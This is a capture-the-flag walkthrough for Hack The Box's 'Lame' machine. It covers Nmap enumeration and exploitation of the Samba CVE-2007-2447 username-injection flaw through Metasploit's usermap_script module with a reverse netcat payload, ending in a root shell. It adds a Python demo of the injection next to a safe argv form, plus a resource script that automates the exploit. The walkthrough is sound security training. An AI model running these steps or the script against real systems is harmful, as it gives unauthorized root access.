Hack The Box's Lame is an Easy machine that features CVE-2007-2447, a Samba vulnerability first disclosed in 2007 that affected Samba 3.0.0 through 3.0.25rc3. You can learn more about this vulnerability's CVE details here.
After starting the machine on HTB and connecting to your HTB VPN, open a terminal and ping the machine's IP address to make sure the host is reachable. Make sure the IP address you enter matches the one displayed on HTB when you boot the target machine.
ping 10.129.136.4
You should receive replies from the IP address. Press CTRL + C to stop sending packets to the target host. Once you have confirmed the host is reachable, move on to enumeration with Nmap.
Start with a quick service scan using Nmap. The -sV switch enables version detection, which is what tells us the exact software versions we will look up later. You can learn more about Nmap here. Note: I had to use the -Pn flag to skip host discovery in order to get proper scan results. You should receive output like the following in your terminal:
nmap -sV -Pn 10.129.136.4
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-30 22:52 BST
Nmap scan report for 10.129.136.4
Host is up (0.015s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.58 seconds
On port 21 we can see that vsftpd 2.3.4 is running. This version is usually exploitable through a well-known built-in backdoor; however, it is not exploitable on this machine. Let's look instead at the Samba smbd service running on ports 139 and 445. Some research shows that this Samba version can be exploited through the "username map script" configuration option: when that option is set in smb.conf, smbd hands the client-supplied username to a shell when it runs the mapping script, so a username containing shell metacharacters (backticks, for example) is executed as a command. No credentials are needed, because the username is processed before authentication succeeds.
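The script below is an added example, not part of the original walkthrough and not Samba's source code. It models the bug class behind CVE-2007-2447 in Python: a client-supplied username is concatenated into a command string and handed to /bin/sh, next to a hardened form that passes the username as a single argv element with no shell. /bin/echo stands in for the administrator's mapping script (an assumption; Samba runs whatever "username map script" names). The username shape is the one exploit/multi/samba/usermap_script sends ("/=" followed by a backticked command); here the injected command only touches a marker file in a temporary directory, so the example runs locally and proves which form executed it.

```python
import os
import subprocess
import tempfile

# Stand-in for the administrator's mapping script. Assumption for this
# example: in Samba it is whatever 'username map script' in smb.conf names.
# The script itself is not the bug; how the username reaches it is.
MAP_SCRIPT = "/bin/echo"


def map_username_vulnerable(username: str) -> str:
    """Pre-fix shape of the bug: the script path and the client-supplied
    username are glued into one string and run through /bin/sh -c, so
    backticks, ';' and '|' inside the username are interpreted by the shell."""
    cmd = f"{MAP_SCRIPT} {username}"
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout.strip()


def map_username_fixed(username: str) -> str:
    """Hardened form: the username travels as one argv element and no shell
    is involved, so metacharacters reach the script as plain data."""
    proc = subprocess.run([MAP_SCRIPT, username], capture_output=True, text=True)
    return proc.stdout.strip()


def injected_username(command: str) -> str:
    """Username shape used by exploit/multi/samba/usermap_script:
    '/=' followed by the attacker's command in backticks."""
    return f"/=`{command}`"


def demonstrate() -> dict:
    """Run both forms with a username that tries to create a marker file
    (constructed input). Returns what each form printed and whether the
    injected command actually executed."""
    marker = os.path.join(tempfile.mkdtemp(), "pwned")
    username = injected_username(f"touch {marker}")

    # Hardened form first: the marker must not appear.
    out_fixed = map_username_fixed(username)
    ran_in_fixed = os.path.exists(marker)

    # Vulnerable form: the shell evaluates the backticks and runs touch.
    out_vuln = map_username_vulnerable(username)
    ran_in_vuln = os.path.exists(marker)

    return {
        "username": username,
        "fixed_output": out_fixed,          # echo prints the username verbatim
        "fixed_executed": ran_in_fixed,     # False
        "vulnerable_output": out_vuln,      # "/=" (touch printed nothing)
        "vulnerable_executed": ran_in_vuln, # True
    }


if __name__ == "__main__":
    for key, value in demonstrate().items():
        print(f"{key}: {value}")
```

The difference between the two functions is the whole vulnerability: in the vulnerable form the shell sees the attacker's backticks as code, in the fixed form /bin/echo sees them as characters in its argument. On Lame the command that Metasploit puts inside the backticks is a reverse shell, which is why the next section produces a session.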
Open Metasploit in a new terminal by typing "msfconsole".
msfconsole

(Metasploit ASCII banner omitted)

       =[ metasploit v6.1.9-dev                          ]
+ -- --=[ 2169 exploits - 1149 auxiliary - 398 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Save the current environment with the save command, future console restarts will use this environment again

msf6 >
Let's search for Samba exploits using the "search" option.
search samba 3.0

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script         2007-05-14       excellent  No     Samba "username map script" Command Execution
   1  exploit/linux/samba/chain_reply            2010-06-16       good       No     Samba chain_reply Memory Corruption (Linux x86)
   2  exploit/linux/samba/lsa_transnames_heap    2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow
   3  exploit/osx/samba/lsa_transnames_heap      2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   4  exploit/solaris/samba/lsa_transnames_heap  2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow

Interact with a module by name or index. For example info 4, use 4 or use exploit/solaris/samba/lsa_transnames_heap
The exploit we want is the first one, exploit/multi/samba/usermap_script. To load an exploit, type "use" followed by either its full name or its index number from the search results. Note that this module has no "check" method (the Check column says No), so the only way to confirm the target is vulnerable is to run it.
Once the exploit has loaded, type "options" and hit Enter. This lists the module's options, which we will need to configure.
msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT   139              yes       The target port (TCP)

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  147.182.150.190  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf6 exploit(multi/samba/usermap_script) >
RPORT is already set to the correct port (139), but RHOSTS is blank and is required to run the exploit. Set it by typing "set RHOSTS" followed by the IP of the target machine and hitting Enter. Metasploit echoes the value back as confirmation.
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.129.136.4
RHOSTS => 10.129.136.4
msf6 exploit(multi/samba/usermap_script) >
You may also need to change the payload options LHOST and LPORT if you are using a VPN, a virtual machine, or the HTB Pwnbox. LHOST is the address the target will connect back to, so it has to be one the target can reach; on HTB that is your VPN address, not your machine's public or LAN address. Most of the time this is done just by entering "set LHOST" followed by the interface name, usually "tun0", and Metasploit resolves it to that interface's address. With everything set, it's time to run the exploit: type "run" and hit Enter.
msf6 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP handler on 10.10.14.75:4444
[*] Command shell session 1 opened (10.10.14.75:4444 -> 10.129.136.4:34959) at 2022-04-30 23:20:35 +0100
Looks like we got a command shell session! Type "shell" to upgrade it to an interactive shell; Metasploit looks for python and bash on the target and uses them to spawn a proper TTY.
shell
[*] Trying to find binary 'python' on the target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine
[*] Found bash at /bin/bash
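The whole Metasploit sequence above (load the module, set RHOSTS, point LHOST at the VPN interface, run, then drop into the session) can be replayed from one resource script. This is an added example, not from the original walkthrough; it assumes the target IP shown on this page, a VPN interface named tun0 and the default listen port 4444, and it uses "exploit -z" so the session is backgrounded rather than interacted with automatically.

```rc
# lame.rc: replay of the usermap_script steps from this walkthrough.
# Run with: msfconsole -q -r lame.rc
use exploit/multi/samba/usermap_script
set RHOSTS 10.129.136.4
set RPORT 139
set PAYLOAD cmd/unix/reverse_netcat
set LHOST tun0
set LPORT 4444
# -z: do not auto-interact; the session is listed afterwards
exploit -z
sessions -l
# attach to the first session; type "shell" there to upgrade it, as above
sessions -i 1
```

If the handler starts but no session ever opens, the usual cause is LHOST: the target must be able to reach the address you listen on, so check that "set LHOST tun0" resolved to your 10.10.x.x VPN address in the "Started reverse TCP handler" line and not to a public or LAN IP.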
Because smbd runs as root, the shell this exploit gives you is already root; confirm it with "id" before doing anything else, as there is no separate privilege escalation step on this machine. You can now navigate through the target system to obtain the user.txt and root.txt flags using ordinary Linux commands.